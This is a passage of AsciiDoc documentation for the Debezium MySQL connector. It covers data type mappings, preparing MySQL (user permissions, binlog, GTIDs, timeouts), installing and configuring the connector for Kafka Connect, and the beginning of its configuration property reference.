values.\n\n|`YEAR[(2\|4)]`\n|`INT32`\n|`io.debezium.time.Year`\n\n|`TIMESTAMP[(M)]`\n|`STRING`\na|`io.debezium.time.ZonedTimestamp` +\nIn link:https:\/\/www.iso.org\/iso-8601-date-and-time-format.html[ISO 8601] format with microsecond precision. MySQL allows `M` to be in the range of `0-6`.\n\n|===\n\n[id=\"mysql-temporal-types\"]\n=== Temporal types\n\nExcluding the `TIMESTAMP` data type, MySQL temporal types depend on the value of the `time.precision.mode` connector configuration property. For `TIMESTAMP` columns whose default value is specified as `CURRENT_TIMESTAMP` or `NOW`, the value `1970-01-01 00:00:00` is used as the default value in the Kafka Connect schema. \n\nMySQL allows zero-values for `DATE`, `DATETIME`, and `TIMESTAMP` columns because zero-values are sometimes preferred over null values. The MySQL connector represents zero-values as null values when the column definition allows null values, or as the epoch day when the column does not allow null values.
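\n\nThe following sketch illustrates this rule. The table and values are hypothetical, and inserting zero-value dates assumes that the server's `sql_mode` permits them: \n\n[source,sql]\n----\n-- Hypothetical table: c1 allows null values, c2 does not.\nCREATE TABLE zero_dates (c1 DATE, c2 DATE NOT NULL);\nINSERT INTO zero_dates VALUES ('0000-00-00', '0000-00-00');\n-- In the emitted change event, c1 is represented as null,\n-- and c2 is represented as the epoch day (1970-01-01).\n----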
\n\n.Temporal values without time zones\nThe `DATETIME` type represents a local date and time such as \"2018-01-13 09:48:27\". As you can see, there is no time zone information. Such columns are converted into epoch milliseconds or microseconds based on the column\u2019s precision by using UTC. The `TIMESTAMP` type represents a timestamp without time zone information. It is converted by MySQL from the server (or session\u2019s) current time zone into UTC when writing and from UTC into the server (or session's) current time zone when reading back the value. For example:\n\n* `DATETIME` with a value of `2018-06-20 06:37:03` becomes `1529476623000`.\n* `TIMESTAMP` with a value of `2018-06-20 06:37:03` becomes `2018-06-20T13:37:03Z`.\n\n`TIMESTAMP` columns are converted into an equivalent `io.debezium.time.ZonedTimestamp` in UTC based on the server (or session\u2019s) current time zone. The time zone is queried from the server by default. If this fails, it must be specified explicitly by setting the `serverTimezone` MySQL configuration option. For example, if the database\u2019s time zone (either globally or configured for the connector by means of the `serverTimezone` option) is \"America\/Los_Angeles\", the TIMESTAMP value \"2018-06-20 06:37:03\" is represented by a `ZonedTimestamp` with the value \"2018-06-20T13:37:03Z\".\n\nThe time zone of the JVM running Kafka Connect and Debezium does not affect these conversions.\n\nMore details about properties related to temporal values are in the documentation for {link-prefix}:{link-mysql-connector}#mysql-connector-properties[MySQL connector configuration properties].\n\ntime.precision.mode=adaptive_time_microseconds (default)::\nThe MySQL connector determines the literal type and semantic type based on the column's data type definition so that events represent exactly the values in the database. All time fields are in microseconds. Only positive `TIME` field values in the range of `00:00:00.000000` to `23:59:59.999999` can be captured correctly.\n+\n.Mappings when `time.precision.mode=adaptive_time_microseconds`\n[cols=\"25%a,20%a,55%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|MySQL type |Literal type |Semantic type\n\n|`DATE`\n|`INT32`\na|`io.debezium.time.Date` +\nRepresents the number of days since the epoch.\n\n|`TIME[(M)]`\n|`INT64`\na|`io.debezium.time.MicroTime` +\nRepresents the time value in microseconds and does not include time zone information. MySQL allows `M` to be in the range of `0-6`.\n\n|`DATETIME, DATETIME(0), DATETIME(1), DATETIME(2), DATETIME(3)`\n|`INT64`\na|`io.debezium.time.Timestamp` +\nRepresents the number of milliseconds past the epoch and does not include time zone information.\n\n|`DATETIME(4), DATETIME(5), DATETIME(6)`\n|`INT64`\na|`io.debezium.time.MicroTimestamp` +\nRepresents the number of microseconds past the epoch and does not include time zone information.\n\n|===\n\ntime.precision.mode=connect::\nThe MySQL connector uses defined Kafka Connect logical types. This approach is less precise than the default approach and the events could be less precise if the database column has a _fractional second precision_ value greater than `3`. Values in only the range of `00:00:00.000` to `23:59:59.999` can be handled. Set `time.precision.mode=connect` only if you can ensure that the `TIME` values in your tables never exceed the supported ranges. 
The `connect` setting is expected to be removed in a future version of {prodname}.\n+\n.Mappings when `time.precision.mode=connect`\n[cols=\"25%a,20%a,55%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|MySQL type |Literal type |Semantic type\n\n|`DATE`\n|`INT32`\na|`org.apache.kafka.connect.data.Date` +\nRepresents the number of days since the epoch.\n\n|`TIME[(M)]`\n|`INT64`\na|`org.apache.kafka.connect.data.Time` +\nRepresents the time value in milliseconds since midnight and does not include time zone information.\n\n|`DATETIME[(M)]`\n|`INT64`\na|`org.apache.kafka.connect.data.Timestamp` +\nRepresents the number of milliseconds since the epoch, and does not include time zone information.\n\n|===\n\n[id=\"mysql-decimal-types\"]\n=== Decimal types\n\n{prodname} connectors handle decimals according to the setting of the {link-prefix}:{link-mysql-connector}#mysql-property-decimal-handling-mode[`decimal.handling.mode` connector configuration property]. \n\ndecimal.handling.mode=precise::\n+\n.Mappings when `decimal.handling.mode=precise`\n[cols=\"30%a,15%a,55%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|MySQL type |Literal type |Semantic type\n\n|`NUMERIC[(M[,D])]`\n|`BYTES`\na|`org.apache.kafka.connect.data.Decimal` +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point was shifted.\n\n|`DECIMAL[(M[,D])]`\n|`BYTES`\na|`org.apache.kafka.connect.data.Decimal` +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point was shifted.\n\n|===\n\ndecimal.handling.mode=double::\n+\n.Mappings when `decimal.handling.mode=double`\n[cols=\"30%a,30%a,40%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|MySQL type |Literal type |Semantic type\n\n|`NUMERIC[(M[,D])]`\n|`FLOAT64`\na|_n\/a_\n\n|`DECIMAL[(M[,D])]`\n|`FLOAT64`\na|_n\/a_\n\n|===\n\ndecimal.handling.mode=string::\n+\n.Mappings when `decimal.handling.mode=string`\n[cols=\"30%a,30%a,40%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|MySQL type |Literal type |Semantic type\n\n|`NUMERIC[(M[,D])]`\n|`STRING`\na|_n\/a_\n\n|`DECIMAL[(M[,D])]`\n|`STRING`\na|_n\/a_\n\n|===\n\n[id=\"mysql-boolean-values\"]\n=== Boolean values\n\nMySQL handles the `BOOLEAN` value internally in a specific way.\nThe `BOOLEAN` column is internally mapped to the `TINYINT(1)` data type.\nWhen a table is created during streaming, {prodname} receives the original DDL and uses the proper `BOOLEAN` mapping.\nDuring snapshots, {prodname} executes `SHOW CREATE TABLE` to obtain table definitions that return `TINYINT(1)` for both `BOOLEAN` and `TINYINT(1)` columns. 
{prodname} then has no way to obtain the original type mapping and so maps to `TINYINT(1)`.\n\nifdef::community[]\nThe operator can configure the out-of-the-box {link-prefix}:{link-custom-converters}[`TinyIntOneToBooleanConverter` custom converter] that either maps all `TINYINT(1)` columns to `BOOLEAN` or, if the `selector` parameter is set, maps only the subset of columns that match the comma-separated list of regular expressions.\nendif::community[]\n\nFollowing is an example configuration:\n\n----\nconverters=boolean\nboolean.type=io.debezium.connector.mysql.converters.TinyIntOneToBooleanConverter\nboolean.selector=db1.table1.*, db1.table2.column1\n----\n\n[id=\"mysql-spatial-types\"]\n=== Spatial types\n\nCurrently, the {prodname} MySQL connector supports the following spatial data types.\n\n.Description of spatial type mappings\n[cols=\"35%a,15%a,50%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|MySQL type |Literal type |Semantic type\n\n|`GEOMETRY, +\nLINESTRING, +\nPOLYGON, +\nMULTIPOINT, +\nMULTILINESTRING, +\nMULTIPOLYGON, +\nGEOMETRYCOLLECTION`\n|`STRUCT`\na|`io.debezium.data.geometry.Geometry` +\nContains a structure with two fields:\n\n* `srid (INT32)`: spatial reference system ID that defines the type of geometry object stored in the structure\n* `wkb (BYTES)`: binary representation of the geometry object encoded in the Well-Known-Binary (wkb) format. See the link:https:\/\/www.opengeospatial.org\/standards\/sfa[Open Geospatial Consortium] for more details.\n\n|===\n\n\/\/ Type: assembly\n\/\/ ModuleID: setting-up-mysql-to-run-a-debezium-connector\n\/\/ Title: Setting up MySQL to run a {prodname} connector\n[[setting-up-mysql]]\n== Set up\n\nifdef::product[]\nDetails are in the following sections:\n\n* xref:creating-a-mysql-user-for-a-debezium-connector[]\n* xref:enabling-the-mysql-binlog-for-debezium[]\n* xref:enabling-mysql-gtids-for-debezium[]\n* xref:configuring-mysql-session-timeouts-for-debezium[]\n* xref:enabling-query-log-events-for-debezium-mysql-connectors[]\n\nendif::product[]\n\n\/\/ Type: procedure\n\/\/ ModuleID: creating-a-mysql-user-for-a-debezium-connector\n\/\/ Title: Creating a MySQL user for a {prodname} connector\n[[mysql-creating-user]]\n=== Creating a user \n\nA {prodname} MySQL connector requires a MySQL user account. This MySQL user must have appropriate permissions on all databases for which the {prodname} MySQL connector captures changes.\n\n.Prerequisites\n\n* A MySQL server.\n* Basic knowledge of SQL commands.\n\n.Procedure\n\n. Create the MySQL user:\n+\n[source,SQL]\n----\nmysql> CREATE USER 'user'@'localhost' IDENTIFIED BY 'password';\n----\n\n. Grant the required permissions to the user:\n+\n[source,SQL]\n----\nmysql> GRANT SELECT, RELOAD, SHOW DATABASES, REPLICATION SLAVE, REPLICATION CLIENT ON *.* TO 'user' IDENTIFIED BY 'password';\n----\n+\nThe table below describes the permissions. \n+\nIMPORTANT: If using a hosted option such as Amazon RDS or Amazon Aurora that does not allow a global read lock, table-level locks are used to create the _consistent snapshot_. In this case, you need to also grant `LOCK TABLES` permissions to the user that you create. See {link-prefix}:{link-mysql-connector}#mysql-snapshots[snapshots] for more details.\n\n. 
Finalize the user's permissions:\n+\n[source,SQL]\n----\nmysql> FLUSH PRIVILEGES;\n----\n\n[[permissions-explained-mysql-connector]]\n.Descriptions of user permissions\n[cols=\"3,7\",options=\"header\",subs=\"+attributes\"]\n|===\n|Keyword |Description\n\n|`SELECT`\n|Enables the connector to select rows from tables in databases. This is used only when performing a snapshot.\n\n|`RELOAD`\n|Enables the connector to use the `FLUSH` statement to clear or reload internal caches, flush tables, or acquire locks. This is used only when performing a snapshot.\n\n|`SHOW DATABASES`\n|Enables the connector to see database names by issuing the `SHOW DATABASES` statement. This is used only when performing a snapshot.\n\n|`REPLICATION SLAVE`\n|Enables the connector to connect to and read the MySQL server binlog.\n\n|`REPLICATION CLIENT`\na|Enables the connector to use the following statements:\n\n* `SHOW MASTER STATUS`\n* `SHOW SLAVE STATUS`\n* `SHOW BINARY LOGS`\n\nThe connector always requires this.\n\n|`ON`\n|Identifies the database to which the permissions apply.\n\n|`TO 'user'`\n|Specifies the user to grant the permissions to.\n\n|`IDENTIFIED BY 'password'`\n|Specifies the user's MySQL password.\n\n|===\n\n\/\/ Type: procedure\n\/\/ ModuleID: enabling-the-mysql-binlog-for-debezium\n\/\/ Title: Enabling the MySQL binlog for {prodname}\n[[enable-mysql-binlog]]\n=== Enabling the binlog \n\nYou must enable binary logging for MySQL replication. The binary logs record transaction updates for replication tools to propagate changes. \n\n.Prerequisites\n\n* A MySQL server.\n* Appropriate MySQL user privileges.\n\n.Procedure\n\n. Check whether the `log-bin` option is already on:\n+\n[source,SQL]\n----\nmysql> SELECT variable_value as \"BINARY LOGGING STATUS (log-bin) ::\"\nFROM information_schema.global_variables WHERE variable_name='log_bin';\n----\n\n. If it is `OFF`, configure your MySQL server configuration file with the following properties, which are described in the table below:\n+\n[source,properties]\n----\nserver-id = 223344 \nlog_bin = mysql-bin \nbinlog_format = ROW \nbinlog_row_image = FULL \nexpire_logs_days = 10 \n----\n\n. Confirm your changes by checking the binlog status once more: \n+\n[source,SQL]\n----\nmysql> SELECT variable_value as \"BINARY LOGGING STATUS (log-bin) ::\"\nFROM information_schema.global_variables WHERE variable_name='log_bin';\n----\n\n[[binlog-configuration-properties-mysql-connector]]\n.Descriptions of MySQL binlog configuration properties\n[cols=\"1,4\",options=\"header\",subs=\"+attributes\"]\n|===\n|Property |Description\n\n|`server-id`\n|The value for the `server-id` must be unique for each server and replication client in the MySQL cluster. During MySQL connector set up, {prodname} assigns a unique server ID to the connector.\n\n|`log_bin`\n|The value of `log_bin` is the base name of the sequence of binlog files.\n\n|`binlog_format`\n|The `binlog_format` must be set to `ROW` or `row`.\n\n|`binlog_row_image`\n|The `binlog_row_image` must be set to `FULL` or `full`.\n\n|`expire_logs_days`\n|This is the number of days for automatic binlog file removal. The default is `0`, which means no automatic removal. Set the value to match the needs of your environment. See {link-prefix}:{link-mysql-connector}#mysql-purges-binlog-files-used-by-debezium[MySQL purges binlog files].\n\n|===
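\n\nAs an optional verification, you can also confirm the row-level logging settings before you start the connector: \n\n[source,SQL]\n----\nmysql> SHOW GLOBAL VARIABLES WHERE Variable_name IN ('binlog_format', 'binlog_row_image');\n----\n\nBoth values must match the configuration shown above, that is, `ROW` and `FULL`, for the connector to receive complete row images.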
\n\n\/\/ Type: procedure\n\/\/ ModuleID: enabling-mysql-gtids-for-debezium\n\/\/ Title: Enabling MySQL Global Transaction Identifiers for {prodname}\n[[enable-mysql-gtids]]\n=== Enabling GTIDs\n\nGlobal transaction identifiers (GTIDs) uniquely identify transactions that occur on a server within a cluster. Though not required for a {prodname} MySQL connector, using GTIDs simplifies replication and enables you to more easily confirm if primary and replica servers are consistent.\n\nGTIDs are available in MySQL 5.6.5 and later. See the link:https:\/\/dev.mysql.com\/doc\/refman\/{mysql-version}\/en\/replication-options-gtids.html#option_mysqld_gtid-mode[MySQL documentation] for more details.\n\n.Prerequisites\n\n* A MySQL server.\n* Basic knowledge of SQL commands.\n* Access to the MySQL configuration file.\n\n.Procedure\n\n. Enable `gtid_mode` in the MySQL configuration file:\n+\n[source,properties]\n----\ngtid_mode=ON\n----\n\n. Enable `enforce_gtid_consistency` in the MySQL configuration file:\n+\n[source,properties]\n----\nenforce_gtid_consistency=ON\n----\n\n. Confirm the changes:\n+\n[source,SQL]\n----\nmysql> show global variables like '%GTID%';\n----\n\n.Result\n[source,SQL]\n----\n+--------------------------+-------+\n| Variable_name | Value |\n+--------------------------+-------+\n| enforce_gtid_consistency | ON |\n| gtid_mode | ON |\n+--------------------------+-------+\n----\n\n.Descriptions of GTID options\n[cols=\"3,7\",options=\"header\",subs=\"+attributes\"]\n|===\n|Option |Description\n\n|`gtid_mode`\na|Boolean that specifies whether GTID mode of the MySQL server is enabled or not.\n\n* `ON` = enabled\n* `OFF` = disabled\n\n|`enforce_gtid_consistency`\na|Boolean that specifies whether the server enforces GTID consistency by allowing the execution of statements that can be logged in a transactionally safe manner. Required when using GTIDs.\n\n* `ON` = enabled\n* `OFF` = disabled\n\n|===\n\n\n\/\/ Type: procedure\n\/\/ ModuleID: configuring-mysql-session-timeouts-for-debezium\n\/\/ Title: Configuring MySQL session timeouts for {prodname}\n[[mysql-session-timeouts]]\n=== Configuring session timeouts\n\nWhen an initial consistent snapshot is made for large databases, your established connection could time out while the tables are being read. You can prevent this behavior by configuring `interactive_timeout` and `wait_timeout` in your MySQL configuration file.\n\n.Prerequisites\n\n* A MySQL server.\n* Basic knowledge of SQL commands.\n* Access to the MySQL configuration file.\n\n.Procedure\n\n. Configure `interactive_timeout` in the MySQL configuration file:\n+\n[source,properties]\n----\ninteractive_timeout=<duration-in-seconds>\n----\n\n. Configure `wait_timeout` in the MySQL configuration file:\n+\n[source,properties]\n----\nwait_timeout=<duration-in-seconds>\n----\n\n.Descriptions of MySQL session timeout options\n[cols=\"3,7\",options=\"header\",subs=\"+attributes\"]\n|===\n|Option |Description\n\n|`interactive_timeout`\na|The number of seconds the server waits for activity on an interactive connection before closing it. See link:https:\/\/dev.mysql.com\/doc\/refman\/{mysql-version}\/en\/server-system-variables.html#sysvar_interactive_timeout[MySQL's documentation] for more details.\n\n|`wait_timeout`\na|The number of seconds the server waits for activity on a non-interactive connection before closing it. See link:https:\/\/dev.mysql.com\/doc\/refman\/{mysql-version}\/en\/server-system-variables.html#sysvar_wait_timeout[MySQL's documentation] for more details.\n\n|===
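\n\nFor example, to keep an idle connection open for up to 24 hours while a large snapshot completes, you might set both options as follows. The value `86400` is illustrative; choose a duration that matches your environment: \n\n[source,properties]\n----\ninteractive_timeout=86400\nwait_timeout=86400\n----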
\n\n\/\/ Type: procedure\n\/\/ ModuleID: enabling-query-log-events-for-debezium-mysql-connectors\n\/\/ Title: Enabling query log events for {prodname} MySQL connectors\n[[enable-query-log-events]]\n=== Enabling query log events \n\nYou might want to see the original `SQL` statement for each binlog event. Enabling the `binlog_rows_query_log_events` option in the MySQL configuration file allows you to do this.\n\nThis option is available in MySQL 5.6 and later.\n\n.Prerequisites\n\n* A MySQL server.\n* Basic knowledge of SQL commands.\n* Access to the MySQL configuration file.\n\n.Procedure\n\n* Enable `binlog_rows_query_log_events` in the MySQL configuration file:\n+\n[source,properties]\n----\nbinlog_rows_query_log_events=ON\n----\n+\nThe `binlog_rows_query_log_events` option enables or disables support for including the original `SQL` statement in the binlog entry.\n+\n** `ON` = enabled\n** `OFF` = disabled\n\n\/\/ Type: assembly\n\/\/ ModuleID: deploying-debezium-mysql-connectors\n\/\/ Title: Deploying {prodname} MySQL connectors\n[[mysql-deploying-a-connector]]\n== Deployment\n\nifdef::product[]\nTo deploy a {prodname} MySQL connector, install the {prodname} MySQL connector archive, configure the connector, and start the connector by adding its configuration to Kafka Connect. Details are in the following topics:\n\n* xref:installing-debezium-mysql-connectors[]\n* xref:debezium-mysql-connector-configuration-example[]\n* xref:adding-debezium-mysql-connector-configuration-to-kafka-connect[]\n* xref:descriptions-of-debezium-mysql-connector-configuration-properties[]\nendif::product[]\n\n\/\/ Type: procedure\n\/\/ Title: Installing {prodname} MySQL connectors\n[id=\"installing-debezium-mysql-connectors\"]\n=== Installing\n\nTo install a {prodname} MySQL connector, download the connector archive, extract it to your Kafka Connect environment, and ensure that the plug-ins parent directory is specified in your Kafka Connect environment.\n\n.Prerequisites\n\n* link:https:\/\/zookeeper.apache.org\/[Zookeeper], link:http:\/\/kafka.apache.org\/[Kafka], and link:{link-kafka-docs}.html#connect[Kafka Connect] are installed.\n* MySQL Server is installed and set up for {prodname}.\n\n.Procedure\n\nifdef::product[]\n. Download the {prodname} link:https:\/\/access.redhat.com\/jbossnetwork\/restricted\/listSoftware.html?product=red.hat.integration&downloadType=distributions[MySQL connector].\nendif::product[]\nifdef::community[]\nifeval::['{page-version}' == 'master']\n. Download the {prodname} link:{link-mysql-plugin-snapshot}[MySQL connector plug-in].\nendif::[]\nifeval::['{page-version}' != 'master']\n. Download the {prodname} link:https:\/\/repo1.maven.org\/maven2\/io\/debezium\/debezium-connector-mysql\/{debezium-version}\/debezium-connector-mysql-{debezium-version}-plugin.tar.gz[MySQL connector plug-in].\nendif::[]\nendif::community[]\n. Extract the files into your Kafka Connect environment.\n. Add the plug-ins parent directory to your Kafka Connect `plugin.path`:\n+\n[source]\n----\nplugin.path=\/kafka\/connect\n----\n+\nThe above example assumes that you extracted the {prodname} MySQL connector into the `\/kafka\/connect\/debezium-connector-mysql` path.\n\n. Restart your Kafka Connect process. This ensures that the new JAR files are picked up.
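\n\nAs a quick check, you can confirm that Kafka Connect found the connector by querying the link:{link-kafka-docs}\/#connect_rest[Kafka Connect REST API]. The following example assumes that the REST interface listens on its default port, 8083: \n\n[source,shell]\n----\n# The output should list io.debezium.connector.mysql.MySqlConnector\n# among the installed connector plug-ins.\ncurl -s http:\/\/localhost:8083\/connector-plugins\n----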
\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-mysql-connector-configuration-example\n\/\/ Title: {prodname} MySQL connector configuration example\n[[mysql-example]]\n[[mysql-example-configuration]]\n=== Connector configuration example\n\nifdef::community[]\nTypically, you configure a {prodname} MySQL connector in a `.json` file that sets configuration properties for the connector. Following is an example configuration for a MySQL connector that connects to a MySQL server on port 3306 at 192.168.99.100, whose logical name is `fullfillment`.\n\nFor details, see {link-prefix}:{link-mysql-connector}#mysql-connector-properties[MySQL connector configuration properties].\n\n[source,json]\n----\n{\n \"name\": \"inventory-connector\", \/\/ <1>\n \"config\": {\n \"connector.class\": \"io.debezium.connector.mysql.MySqlConnector\", \/\/ <2>\n \"database.hostname\": \"192.168.99.100\", \/\/ <3>\n \"database.port\": \"3306\", \/\/ <4>\n \"database.user\": \"debezium-user\", \/\/ <5>\n \"database.password\": \"debezium-user-pw\", \/\/ <6>\n \"database.server.id\": \"184054\", \/\/ <7>\n \"database.server.name\": \"fullfillment\", \/\/ <8>\n \"database.whitelist\": \"inventory\", \/\/ <9>\n \"database.history.kafka.bootstrap.servers\": \"kafka:9092\", \/\/ <10>\n \"database.history.kafka.topic\": \"dbhistory.fullfillment\", \/\/ <11>\n \"include.schema.changes\": \"true\" \/\/ <12>\n }\n}\n----\n<1> Connector's name when registered with the Kafka Connect service.\n<2> Connector's class name.\n<3> MySQL server address.\n<4> MySQL server port number.\n<5> MySQL user with the appropriate privileges.\n<6> MySQL user's password.\n<7> Unique ID of the connector.\n<8> Logical name of the MySQL server or cluster.\n<9> List of databases for which the connector captures changes.\n<10> List of Kafka brokers that the connector uses to write and recover DDL statements to the database history topic.\n<11> Name of the database history topic. This topic is for internal use only and should not be used by consumers. \n<12> Flag that specifies if the connector should generate events for DDL changes and emit them to the `fullfillment` schema change topic for use by consumers. \nendif::community[]\n\nifdef::product[]\n\nTypically, you configure a {prodname} MySQL connector in a `.yaml` file that sets connector configuration properties. Following is an example of the configuration for a MySQL connector that connects to a MySQL server on port 3306 and captures changes to the `inventory` database. 
\nFor details, see {link-prefix}:{link-mysql-connector}#mysql-connector-properties[MySQL connector configuration properties].\n\n[source,yaml,options=\"nowrap\"]\n----\n apiVersion: kafka.strimzi.io\/v1beta1\n kind: KafkaConnector\n metadata:\n name: inventory-connector \/\/ <1>\n labels:\n strimzi.io\/cluster: my-connect-cluster\n spec:\n class: io.debezium.connector.mysql.MySqlConnector\n tasksMax: 1 \/\/ <2>\n config: \/\/ <3>\n database.hostname: mysql \/\/ <4>\n database.port: 3306\n database.user: debezium\n database.password: dbz\n database.server.id: 184054 \/\/ <5>\n database.server.name: dbserver1 \/\/ <5>\n database.whitelist: inventory \/\/ <6>\n database.history.kafka.bootstrap.servers: my-cluster-kafka-bootstrap:9092 \/\/ <7>\n database.history.kafka.topic: schema-changes.inventory \/\/ <7>\n----\n\n.Descriptions of connector configuration settings\n[cols=\"1,7\",options=\"header\",subs=\"+attributes\"]\n|===\n|Item |Description\n\n|1\n|The name of the connector.\n\n|2\n|Only one task should operate at any one time.\nBecause the MySQL connector reads the MySQL server\u2019s `binlog`,\nusing a single connector task ensures proper order and event handling.\nThe Kafka Connect service uses connectors to start one or more tasks that do the work,\nand it automatically distributes the running tasks across the cluster of Kafka Connect services.\nIf any of the services stop or crash,\nthose tasks will be redistributed to running services.\n\n|3\n|The connector\u2019s configuration.\n\n|4\n|The database host, which is the name of the container running the MySQL server (`mysql`).\n\n|5\n|A unique server ID and name.\nThe server name is the logical identifier for the MySQL server or cluster of servers.\nThis name is used as the prefix for all Kafka topics.\n\n|6\n|Changes in only the `inventory` database are captured.\n\n|7\n|The connector stores the history of the database schemas in Kafka using this broker (the same broker to which you are sending events) and topic name.\nUpon restart, the connector recovers the schemas of the database that existed at the point in time in the binlog when the connector should begin reading.\n\n|===\n\nendif::product[]\n\n\/\/ Type: procedure\n\/\/ ModuleID: adding-debezium-mysql-connector-configuration-to-kafka-connect\n\/\/ Title: Adding {prodname} MySQL connector configuration to Kafka Connect\n[[mysql-adding-configuration]]\n=== Adding connector configuration \nifdef::community[]\nTo start running a MySQL connector, configure a connector and add the configuration to your Kafka Connect cluster. \n\n.Prerequisites\n\n* {link-prefix}:{link-mysql-connector}#setting-up-mysql[MySQL server] is \nset up for a {prodname} connector.\n\n* {prodname} MySQL connector is installed. \n\n.Procedure\n\n. Create a configuration for the MySQL connector.\n\n. Use the link:{link-kafka-docs}\/#connect_rest[Kafka Connect REST API] to add that connector configuration to your Kafka Connect cluster. \n\nendif::community[]\n\nifdef::product[]\nYou can use a provided {prodname} container to deploy a {prodname} MySQL connector. In this procedure, you build a custom Kafka Connect container image for {prodname}, configure the {prodname} connector as needed, and then add your connector configuration to your Kafka Connect environment. \n\n.Prerequisites\n\n* Podman or Docker is installed.\n* You have sufficient rights to create and manage containers.\n* You downloaded the {prodname} MySQL connector archive. \n\n.Procedure\n\n. 
Extract the {prodname} MySQL connector archive to create a directory structure for the connector plug-in, for example: \n+\n[subs=\"+macros\"]\n----\npass:quotes[*tree .\/my-plugins\/*]\n.\/my-plugins\/\n\u251c\u2500\u2500 debezium-connector-mysql\n\u2502 \u251c\u2500\u2500 ...\n----\n\n. Create and publish a custom image for running your {prodname} connector:\n\n.. Create a new `Dockerfile` by using `{DockerKafkaConnect}` as the base image. In the following example, you would replace _my-plugins_ with the name of your plug-ins directory:\n+\n[subs=\"+macros,+attributes\"]\n----\nFROM {DockerKafkaConnect}\nUSER root:root\npass:quotes[COPY _.\/my-plugins\/_ \/opt\/kafka\/plugins\/]\nUSER 1001\n----\n+\nBefore Kafka Connect starts running the connector, Kafka Connect loads any third-party plug-ins that are in the `\/opt\/kafka\/plugins` directory.\n\n.. Build the container image. For example, if you saved the `Dockerfile` that you created in the previous step as `debezium-container-for-mysql`, then you would run the following command:\n+\n`podman build -t debezium-container-for-mysql:latest .`\n\n.. Push your custom image to your container registry, for example:\n+\n`podman push debezium-container-for-mysql:latest`\n\n.. Point to the new container image. Do one of the following:\n+\n* Edit the `spec.image` property of the `KafkaConnect` custom resource. If set, this property overrides the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable in the Cluster Operator. For example:\n+\n[source,yaml,subs=attributes+]\n----\napiVersion: {KafkaConnectApiVersion}\nkind: KafkaConnect\nmetadata:\n name: my-connect-cluster\nspec:\n #...\n image: debezium-container-for-mysql\n----\n+\n* In the `install\/cluster-operator\/050-Deployment-strimzi-cluster-operator.yaml` file, edit the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable to point to the new container image and reinstall the Cluster Operator. If you edit this file you must apply it to your OpenShift cluster.\n\n. Create a `KafkaConnector` custom resource that defines your {prodname} MySQL connector instance. See {LinkDebeziumUserGuide}#mysql-example-configuration[the connector configuration example].\n\n. Apply the connector instance, for example: \n+\n`oc apply -f inventory-connector.yaml`\n+\nThis registers `inventory-connector` and the connector starts to run against the `inventory` database.\n\n. Verify that the connector was created and has started to capture changes in the specified database. You can verify the connector instance by watching the Kafka Connect log output as, for example, `inventory-connector` starts.\n\n.. Display the Kafka Connect log output:\n+\n[source,shell,options=\"nowrap\"]\n----\noc logs $(oc get pods -o name -l strimzi.io\/name=my-connect-cluster-connect)\n----\n\n.. Review the log output to verify that the initial snapshot has been executed. You should see something like the following lines: \n+\n[source,shell,options=\"nowrap\"]\n----\n... INFO Starting snapshot for ...\n... INFO Snapshot is using user 'debezium' ... \n----\n\nendif::product[]\n\n.Results\n\nWhen the connector starts, it {link-prefix}:{link-mysql-connector}#mysql-snapshots[performs a consistent snapshot] of the MySQL databases that the connector is configured for. The connector then starts generating data change events for row-level operations and streaming change event records to Kafka topics. 
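\n\nTo inspect the records, you can consume from one of the connector's topics. The topic name is the logical server name followed by the database and table names, for example `dbserver1.inventory.customers` for the configuration shown earlier. The following command assumes a local Kafka installation with its broker on the default port: \n\n[source,shell,options=\"nowrap\"]\n----\n# Reads the change event records for the inventory.customers table from the beginning of the topic\nbin\/kafka-console-consumer.sh --bootstrap-server localhost:9092 \\\n --topic dbserver1.inventory.customers --from-beginning\n----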
\n\n\/\/ Type: reference\n\/\/ ModuleID: descriptions-of-debezium-mysql-connector-configuration-properties\n\/\/ Title: Description of {prodname} MySQL connector configuration properties\n[[mysql-connector-properties]]\n=== Connector properties\n\nThe {prodname} MySQL connector has numerous configuration properties that you can use to achieve the right connector behavior for your application. Many properties have default values. Information about the properties is organized as follows:\n\n* xref:mysql-required-connector-configuration-properties[Required connector configuration properties]\n* xref:mysql-advanced-connector-configuration-properties[Advanced connector configuration properties]\n* xref:mysql-pass-through-configuration-properties[Pass-through configuration properties]\n\n[id=\"mysql-required-connector-configuration-properties\"]\nThe following configuration properties are _required_ unless a default value is available.\n\n.Required MySQL connector configuration properties\n[cols=\"33%a,17%a,50%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|Property |Default |Description\n\n|[[mysql-property-name]]<<mysql-property-name, `name`>>\n|\n|Unique name for the connector. Attempting to register again with the same name fails. This property is required by all Kafka Connect connectors.\n\n|[[mysql-property-connector-class]]<<mysql-property-connector-class, `connector.class`>>\n|\n|The name of the Java class for the connector. Always specify `io.debezium{zwsp}.connector.mysql.MySqlConnector` for the MySQL connector.\n\n|[[mysql-property-tasks-max]]<<mysql-property-tasks-max, `tasks.max`>>\n|`1`\n|The maximum number of tasks that should be created for this connector. The MySQL connector always uses a single task and therefore does not use this value, so the default is always acceptable.\n\n|[[mysql-property-database-hostname]]<<mysql-property-database-hostname, `database.hostname`>>\n|\n|IP address or host name of the MySQL database server.\n\n|[[mysql-property-database-port]]<<mysql-property-database-port, `database.port`>>\n|`3306`\n|Integer port number of the MySQL database server.\n\n|[[mysql-property-database-user]]<<mysql-property-database-user, `database.user`>>\n|\n|Name of the MySQL user to use when connecting to the MySQL database server.\n\n|[[mysql-property-database-password]]<<mysql-property-database-password, `database.password`>>\n|\n|Password to use when connecting to the MySQL database server.\n\n|[[mysql-property-database-server-name]]<<mysql-property-database-server-name, `database.server.name`>>\n|\n|Logical name that identifies and provides a namespace for the particular MySQL database server\/cluster in which {prodname} is capturing changes. The logical name should be unique across all other connectors, since it is used as a prefix for all Kafka topic names that receive events emitted by this connector.\nOnly alphanumeric characters and underscores are allowed in this name.\n\n|[[mysql-property-database-server-id]]<<mysql-property-database-server-id, `database.server.id`>>\n|_random_\n|A numeric ID of this database client, which must be unique across all currently-running database processes in the MySQL cluster. This 